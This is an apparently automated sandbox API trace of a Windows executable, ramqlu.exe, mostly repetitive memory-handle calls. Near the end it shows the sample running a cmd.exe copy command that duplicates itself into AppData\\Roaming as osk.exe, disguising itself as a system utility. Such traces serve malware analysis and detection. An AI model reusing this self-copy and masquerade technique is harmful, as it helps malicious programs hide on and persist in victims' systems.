GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.806] GlobalUnlock (hMem=0x270004) returned 0 [0051.806] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.806] GlobalUnlock (hMem=0x27000c) returned 0 [0051.807] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.807] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.807] GlobalUnlock (hMem=0x27000c) returned 0 [0051.807] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.807] GlobalLock 
(hMem=0x270004) returned 0x5d0608 [0051.807] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.807] GlobalUnlock (hMem=0x27000c) returned 0 [0051.807] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.807] GlobalUnlock (hMem=0x270004) returned 0 [0051.807] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.807] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.807] GlobalUnlock (hMem=0x270004) returned 0 [0051.807] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.807] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.807] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.807] GlobalUnlock (hMem=0x270004) returned 0 [0051.808] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.808] GlobalUnlock (hMem=0x27000c) returned 0 [0051.808] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.808] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.808] GlobalUnlock (hMem=0x27000c) returned 0 [0051.808] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.808] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.808] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.808] GlobalUnlock (hMem=0x27000c) returned 0 [0051.808] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.808] GlobalUnlock (hMem=0x270004) returned 0 [0051.808] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.808] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.808] GlobalUnlock (hMem=0x270004) returned 0 [0051.808] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.808] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.808] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.809] GlobalUnlock (hMem=0x270004) returned 0 [0051.809] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.809] GlobalUnlock (hMem=0x27000c) returned 0 [0051.809] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.809] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.809] GlobalUnlock (hMem=0x27000c) returned 0 [0051.809] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.809] GlobalLock (hMem=0x270004) 
returned 0x5d0608 [0051.809] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.809] GlobalUnlock (hMem=0x27000c) returned 0 [0051.809] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.809] GlobalUnlock (hMem=0x270004) returned 0 [0051.809] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.809] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.809] GlobalUnlock (hMem=0x270004) returned 0 [0051.809] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.809] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.809] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.810] GlobalUnlock (hMem=0x270004) returned 0 [0051.810] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.810] GlobalUnlock (hMem=0x27000c) returned 0 [0051.810] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.810] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.810] GlobalUnlock (hMem=0x27000c) returned 0 [0051.810] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.810] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.810] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.810] GlobalUnlock (hMem=0x27000c) returned 0 [0051.810] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.810] GlobalUnlock (hMem=0x270004) returned 0 [0051.810] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.810] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.810] GlobalUnlock (hMem=0x270004) returned 0 [0051.810] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.810] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.811] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.811] GlobalUnlock (hMem=0x270004) returned 0 [0051.811] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.811] GlobalUnlock (hMem=0x27000c) returned 0 [0051.811] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.811] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.811] GlobalUnlock (hMem=0x27000c) returned 0 [0051.811] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.811] GlobalLock (hMem=0x270004) returned 0x5d0608 
[0051.811] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.811] GlobalUnlock (hMem=0x27000c) returned 0 [0051.811] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.811] GlobalUnlock (hMem=0x270004) returned 0 [0051.811] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.811] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.811] GlobalUnlock (hMem=0x270004) returned 0 [0051.811] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.812] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.812] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.812] GlobalUnlock (hMem=0x270004) returned 0 [0051.812] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.812] GlobalUnlock (hMem=0x27000c) returned 0 [0051.812] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.812] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.812] GlobalUnlock (hMem=0x27000c) returned 0 [0051.812] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.812] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.812] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.812] GlobalUnlock (hMem=0x27000c) returned 0 [0051.812] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.812] GlobalUnlock (hMem=0x270004) returned 0 [0051.812] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.812] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.812] GlobalUnlock (hMem=0x270004) returned 0 [0051.812] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.813] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.813] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.813] GlobalUnlock (hMem=0x270004) returned 0 [0051.813] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.813] GlobalUnlock (hMem=0x27000c) returned 0 [0051.813] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.816] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.816] GlobalUnlock (hMem=0x27000c) returned 0 [0051.816] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.816] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.816] 
GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.816] GlobalUnlock (hMem=0x27000c) returned 0 [0051.816] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.816] GlobalUnlock (hMem=0x270004) returned 0 [0051.816] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.816] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.816] GlobalUnlock (hMem=0x270004) returned 0 [0051.816] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.817] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.817] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.817] GlobalUnlock (hMem=0x270004) returned 0 [0051.817] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.817] GlobalUnlock (hMem=0x27000c) returned 0 [0051.817] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.817] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.817] GlobalUnlock (hMem=0x27000c) returned 0 [0051.817] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.817] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.817] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.817] GlobalUnlock (hMem=0x27000c) returned 0 [0051.817] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.817] GlobalUnlock (hMem=0x270004) returned 0 [0051.817] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.817] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.817] GlobalUnlock (hMem=0x270004) returned 0 [0051.818] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.818] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.818] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.818] GlobalUnlock (hMem=0x270004) returned 0 [0051.818] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.818] GlobalUnlock (hMem=0x27000c) returned 0 [0051.818] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.818] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.818] GlobalUnlock (hMem=0x27000c) returned 0 [0051.818] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.818] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.818] GlobalHandle 
(pMem=0x5ce5f8) returned 0x27000c [0051.818] GlobalUnlock (hMem=0x27000c) returned 0 [0051.818] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.818] GlobalUnlock (hMem=0x270004) returned 0 [0051.818] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.818] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.818] GlobalUnlock (hMem=0x270004) returned 0 [0051.819] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.819] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.819] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.819] GlobalUnlock (hMem=0x270004) returned 0 [0051.819] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.819] GlobalUnlock (hMem=0x27000c) returned 0 [0051.819] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.819] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.819] GlobalUnlock (hMem=0x27000c) returned 0 [0051.819] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.819] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.819] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.819] GlobalUnlock (hMem=0x27000c) returned 0 [0051.819] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.819] GlobalUnlock (hMem=0x270004) returned 0 [0051.819] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.819] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.819] GlobalUnlock (hMem=0x270004) returned 0 [0051.820] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.820] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.820] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.820] GlobalUnlock (hMem=0x270004) returned 0 [0051.820] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.820] GlobalUnlock (hMem=0x27000c) returned 0 [0051.820] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.820] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.820] GlobalUnlock (hMem=0x27000c) returned 0 [0051.820] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.820] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.820] GlobalHandle (pMem=0x5ce5f8) 
returned 0x27000c [0051.820] GlobalUnlock (hMem=0x27000c) returned 0 [0051.820] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.820] GlobalUnlock (hMem=0x270004) returned 0 [0051.820] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.820] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.820] GlobalUnlock (hMem=0x270004) returned 0 [0051.821] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.821] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.821] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.821] GlobalUnlock (hMem=0x270004) returned 0 [0051.821] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.821] GlobalUnlock (hMem=0x27000c) returned 0 [0051.821] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.821] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.821] GlobalUnlock (hMem=0x27000c) returned 0 [0051.821] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.821] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.821] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.821] GlobalUnlock (hMem=0x27000c) returned 0 [0051.821] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.821] GlobalUnlock (hMem=0x270004) returned 0 [0051.821] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.821] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.822] GlobalUnlock (hMem=0x270004) returned 0 [0051.822] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.822] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.822] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.822] GlobalUnlock (hMem=0x270004) returned 0 [0051.822] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.822] GlobalUnlock (hMem=0x27000c) returned 0 [0051.822] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.822] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.822] GlobalUnlock (hMem=0x27000c) returned 0 [0051.822] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.822] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.822] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c 
[0051.822] GlobalUnlock (hMem=0x27000c) returned 0 [0051.822] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.822] GlobalUnlock (hMem=0x270004) returned 0 [0051.823] SHGetMalloc (in: ppMalloc=0x18fd40 | out: ppMalloc=0x18fd40*=0x767666bc) returned 0x0 [0051.823] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=26, ppidl=0x18fd3c | out: ppidl=0x18fd3c) returned 0x0 [0055.983] SHGetPathFromIDListW (in: pidl=0x5ceb08, pszPath=0x5d7db4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0055.985] SysReAllocStringLen (in: pbstr=0x18fd68*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x18fd68*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0055.985] IMalloc:Free (This=0x767666bc, pv=0x5ceb08) [0055.985] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0055.985] SysReAllocStringLen (in: pbstr=0x441208*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x441208*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0055.985] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5898b8, cbMultiByte=7, lpWideCharStr=0x18ed3c, cchWideChar=2047 | out: lpWideCharStr="osk.exe\x18ㅬ疧\x18㹕疧伙]\x18") returned 7 [0055.986] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" " [0055.988] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" " [0055.991] GlobalLock (hMem=0x270004) returned 0x5cf090 [0055.991] GlobalHandle (pMem=0x5cf090) returned 0x270004 [0055.991] GlobalUnlock (hMem=0x270004) returned 0 [0055.991] GlobalLock (hMem=0x270004) returned 0x5cf090 [0055.992] GlobalLock (hMem=0x27000c) returned 0x5e7988 [0055.992] GlobalHandle (pMem=0x5cf090) returned 0x270004 [0055.992] GlobalUnlock (hMem=0x270004) returned 0 [0055.992] GlobalHandle (pMem=0x5e7988) returned 0x27000c [0055.992] GlobalUnlock (hMem=0x27000c) returned 0 [0055.992] GlobalLock (hMem=0x27000c) 
returned 0x5e7988 [0055.992] GlobalHandle (pMem=0x5e7988) returned 0x27000c [0055.992] GlobalUnlock (hMem=0x27000c) returned 0 [0055.992] GlobalLock (hMem=0x27000c) returned 0x5e7988 [0055.992] GlobalLock (hMem=0x270004) returned 0x5cf090 [0055.992] GlobalHandle (pMem=0x5e7988) returned 0x27000c [0055.992] GlobalUnlock (hMem=0x27000c) returned 0 [0055.992] GlobalHandle (pMem=0x5cf090) returned 0x270004 [0055.992] GlobalUnlock (hMem=0x270004) returned 0 [0055.992] GlobalLock (hMem=0x270004) returned 0x5e7988 [0055.992] GlobalHandle (pMem=0x5e7988) returned 0x270004 [0055.992] GlobalUnlock (hMem=0x270004) returned 0 [0055.992] GlobalLock (hMem=0x270004) returned 0x5e7988 [0055.992] GlobalLock (hMem=0x27000c) returned 0x5cf090 [0055.992] GlobalHandle (pMem=0x5e7988) returned 0x270004 [0055.992] GlobalUnlock (hMem=0x270004) returned 0 [0055.992] GlobalHandle (pMem=0x5cf090) returned 0x27000c [0055.992] GlobalUnlock (hMem=0x27000c) returned 0 [0055.993] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\pmleb", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe0c | out: phkResult=0x18fe0c*=0x0) returned 0x2 [0055.993] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fbd0 | out: lpFindFileData=0x18fbd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x5b0000, ftCreationTime.dwHighDateTime=0x5cf090, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x6a258b, ftLastWriteTime.dwLowDateTime=0xd11a181, ftLastWriteTime.dwHighDateTime=0xcf58c75, nFileSizeHigh=0xaf51c0ef, nFileSizeLow=0x6a258b, dwReserved0=0x77c6e36c, dwReserved1=0x77cd19f7, cFileName="ﵔ\x18Ƭ[", cAlternateFileName="")) returned 0xffffffff [0055.993] GetLastError () returned 0x2 [0055.993] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fc14, nSize=0x20a | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0055.993] 
GlobalLock (hMem=0x27000c) returned 0x5e7988 [0055.993] GlobalHandle (pMem=0x5e7988) returned 0x27000c [0055.993] GlobalUnlock (hMem=0x27000c) returned 0 [0055.994] GlobalLock (hMem=0x27000c) returned 0x5e7988 [0055.994] GlobalLock (hMem=0x270004) returned 0x5cf090 [0055.999] GlobalHandle (pMem=0x5e7988) returned 0x27000c [0055.999] GlobalUnlock (hMem=0x27000c) returned 0 [0055.999] GlobalHandle (pMem=0x5cf090) returned 0x270004 [0055.999] GlobalUnlock (hMem=0x270004) returned 0 [0055.999] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x57a708, cbMultiByte=18, lpWideCharStr=0x18edcc, cchWideChar=2047 | out: lpWideCharStr="/c copy /y \"@\" \"#\"\x18\x18Ő[") returned 18 [0055.999] SysReAllocStringLen (in: pbstr=0x18fdc0*=0x0, psz="/c copy /y \"@\" \"#\"", len=0x12 | out: pbstr=0x18fdc0*="/c copy /y \"@\" \"#\"") returned 1 [0055.999] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="/c copy /y \"@\" \"#\"", cchWideChar=18, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/c copy /y \"@\" \"#\"\x18", lpUsedDefaultChar=0x0) returned 18 [0055.999] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0056.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\" \"#\"", cchWideChar=5, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\" \"#\"py /y \"@\" \"#\"\x18", lpUsedDefaultChar=0x0) returned 5 [0056.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0056.000] SysReAllocStringLen (in: pbstr=0x18fe14*=0x0, psz="/c copy /y 
\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", len=0x41 | out: pbstr=0x18fe14*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"") returned 1 [0056.000] SysReAllocStringLen (in: pbstr=0x18fe1c*="/c copy /y \"@\" \"#\"", psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", len=0x41 | out: pbstr=0x18fe1c*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"") returned 1 [0056.000] SysReAllocStringLen (in: pbstr=0x18fdc0*=0x0, psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", len=0x41 | out: pbstr=0x18fdc0*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"") returned 1 [0056.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", cchWideChar=65, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", lpUsedDefaultChar=0x0) returned 65 [0056.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="#ý\x18", lpUsedDefaultChar=0x0) returned 1 [0056.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\"", cchWideChar=1, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\"ý\x18", lpUsedDefaultChar=0x0) returned 1 [0056.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="#ý\x18", lpUsedDefaultChar=0x0) returned 1 [0056.001] SysReAllocStringLen (in: pbstr=0x18fe10*=0x0, psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" 
\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", len=0x75 | out: pbstr=0x18fe10*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"") returned 1 [0056.001] SysReAllocStringLen (in: pbstr=0x18fe1c*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", len=0x75 | out: pbstr=0x18fe1c*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"") returned 1 [0056.001] GlobalLock (hMem=0x270004) returned 0x5e7988 [0056.001] GlobalHandle (pMem=0x5e7988) returned 0x270004 [0056.001] GlobalUnlock (hMem=0x270004) returned 0 [0056.001] GlobalLock (hMem=0x270004) returned 0x5e7988 [0056.001] GlobalLock (hMem=0x27000c) returned 0x5cf090 [0056.001] GlobalHandle (pMem=0x5e7988) returned 0x270004 [0056.001] GlobalUnlock (hMem=0x270004) returned 0 [0056.001] GlobalHandle (pMem=0x5cf090) returned 0x27000c [0056.001] GlobalUnlock (hMem=0x27000c) returned 0 [0056.001] GetEnvironmentVariableA (in: lpName="COMSPEC", lpBuffer=0x18f9cc, nSize=0x400 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0056.001] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x542b38, cbMultiByte=27, lpWideCharStr=0x18edcc, cchWideChar=2047 | out: lpWideCharStr="C:\\Windows\\system32\\cmd.exe[矆\x04") returned 27 [0056.001] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x18fd90*(cb=0x44, lpReserved=0x0, 
lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fd80 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", lpProcessInformation=0x18fd80*(hProcess=0xe4, hThread=0xe8, dwProcessId=0x534, dwThreadId=0x70c)) returned 1 [0056.727] WaitForSingleObject (hHandle=0xe4, dwMilliseconds=0xffffffff) returned 0x0 [0057.701] CloseHandle (hObject=0xe4) returned 1 [0057.702] CloseHandle (hObject=0xe8) returned 1 [0057.702] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fb80 | out: lpFindFileData=0x18fb80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xed1f1500, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xed1f1500, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="osk.exe", cAlternateFileName="")) returned 0x5d7fc8 [0057.702] FileTimeToLocalFileTime (in: lpFileTime=0x18fb94, lpLocalFileTime=0x18fb14 | out: lpLocalFileTime=0x18fb14) returned 1 [0057.702] FileTimeToDosDateTime (in: lpFileTime=0x18fb14, lpFatDate=0x18fb62, lpFatTime=0x18fb60 | out: lpFatDate=0x18fb62, lpFatTime=0x18fb60) returned 1 [0057.702] FindClose (in: hFindFile=0x5d7fc8 | out: hFindFile=0x5d7fc8) returned 1 [0057.702] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" " [0057.704] GlobalLock (hMem=0x27000c) returned 0x5e7988 [0057.704] GlobalHandle (pMem=0x5e7988) returned 0x27000c [0057.704] GlobalUnlock (hMem=0x27000c) returned 0 [0057.704] GlobalLock 
